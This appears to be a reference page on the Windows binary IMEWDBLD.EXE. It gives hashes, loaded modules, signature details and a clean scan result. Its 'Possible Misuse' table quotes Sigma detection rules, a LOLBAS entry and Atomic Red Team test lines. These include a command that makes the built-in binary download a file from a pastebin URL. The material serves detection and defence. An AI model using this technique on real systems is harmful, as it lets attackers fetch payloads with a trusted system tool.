IMEWDBLD.EXE

  • File Path: C:\Windows\system32\IME\shared\IMEWDBLD.EXE
  • Description: Microsoft IME Open Extended Dictionary Module


Hashes

Type Hash
MD5 8B8C8F73B4E96963DD9A6E760C5F77DD
SHA1 71F3B5DA45334B704E5B738F442A5997A9EEC19E
SHA256 51E8741641C33D13908F3260BEE589871D5EFD9210504F7B4CDEEE50BAE17C2C
SHA384 3D57C2A6F93AB54849FC755C705B655C2B2F75D38B7DCEE95B5683751795FDB2C51890E677A7A376C3D90E153A4DB374
SHA512 31C97E1B37727CB5E1208CB468A4DF2BB9C1CBD7B31443B32BA4C0028DD221C386DEBF745639C4094C4C428E0D382145050F77D46A42EB399BC0FBF6CB366504
SSDEEP 6144:wDVtT8kSl4FnvSGrwuTUJD3PAfjHPPnsFGUPg7Gs/UEVTppNX+:wBd89iFaGrwuTiAfbaXPg7Gs/r
IMP 5D2E928CFCDF45D4BEE31908ADE49B06
PESHA1 941B69469AB7711F9796AE1957DD3D5C766C724C
PE256 6CB60099DCEC6173E073A4FB505036B9A05E0FEE733CC76BEB57949FBD793E38

Runtime Data

Window Title:

Microsoft IME Open Extended Dictionary Error

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\imageres.dll.mui File
(RW-) C:\Users\user File
(RW-) C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.1518_none_de6e2bd0534e2567 File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000004.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000004.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\2\Windows\Theme2131664586 Section
\Windows\Theme966197582 Section

Loaded Modules:

Path
C:\Windows\System32\ADVAPI32.dll
C:\Windows\System32\bcryptPrimitives.dll
C:\Windows\SYSTEM32\Cabinet.dll
C:\Windows\System32\cfgmgr32.dll
C:\Windows\System32\combase.dll
C:\Windows\System32\CRYPT32.dll
C:\Windows\System32\cryptsp.dll
C:\Windows\System32\GDI32.dll
C:\Windows\System32\gdi32full.dll
C:\Windows\system32\IME\shared\IMEWDBLD.EXE
C:\Windows\System32\kernel.appcore.dll
C:\Windows\System32\KERNEL32.DLL
C:\Windows\System32\KERNELBASE.dll
C:\Windows\System32\MSASN1.dll
C:\Windows\System32\msvcp_win.dll
C:\Windows\System32\msvcrt.dll
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\ole32.dll
C:\Windows\System32\OLEAUT32.dll
C:\Windows\System32\powrprof.dll
C:\Windows\System32\profapi.dll
C:\Windows\System32\RPCRT4.dll
C:\Windows\System32\sechost.dll
C:\Windows\System32\shcore.dll
C:\Windows\System32\SHELL32.dll
C:\Windows\System32\shlwapi.dll
C:\Windows\System32\ucrtbase.dll
C:\Windows\System32\USER32.dll
C:\Windows\SYSTEM32\UxTheme.dll
C:\Windows\System32\win32u.dll
C:\Windows\System32\windows.storage.dll
C:\Windows\System32\WINTRUST.dll
C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.1518_none_de6e2bd0534e2567\COMCTL32.dll

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: imewdbld.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.17763.1075 (WinBuild.160101.0800)
  • Product Version: 10.0.17763.1075
  • Language: Language Neutral
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/72
  • VirusTotal Link: https://www.virustotal.com/gui/file/51e8741641c33d13908f3260bee589871d5efd9210504f7b4cdeee50bae17c2c/detection/

File Similarity (ssdeep match)

File Score
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE 33
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE 43
C:\Windows\system32\IME\SHARED\IMEWDBLD.EXE 38
C:\Windows\SysWOW64\IME\shared\IMEWDBLD.EXE 36
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 35
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 32
C:\windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 32
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 32
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 33

Possible Misuse

The following table contains possible examples of IMEWDBLD.EXE being misused. While IMEWDBLD.EXE is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma net_connection_win_imewdbld.yml title: Download a File with IMEWDBLD.exe DRL 1.0
sigma net_connection_win_imewdbld.yml description: Use IMEWDBLD.exe (built-in to windows) to download a file DRL 1.0
sigma net_connection_win_imewdbld.yml Image|endswith: '\IMEWDBLD.exe' DRL 1.0
LOLBAS IMEWDBLD.yml Name: IMEWDBLD.exe  
LOLBAS IMEWDBLD.yml - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw  
LOLBAS IMEWDBLD.yml Description: IMEWDBLD.exe attempts to load a dictionary file; if provided a URL as an argument, it will download the file served by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>  
LOLBAS IMEWDBLD.yml - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe  
atomic-red-team index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1105.md - Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md ## Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. MIT License. © 2018 Red Canary
atomic-red-team T1105.md $imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe" MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.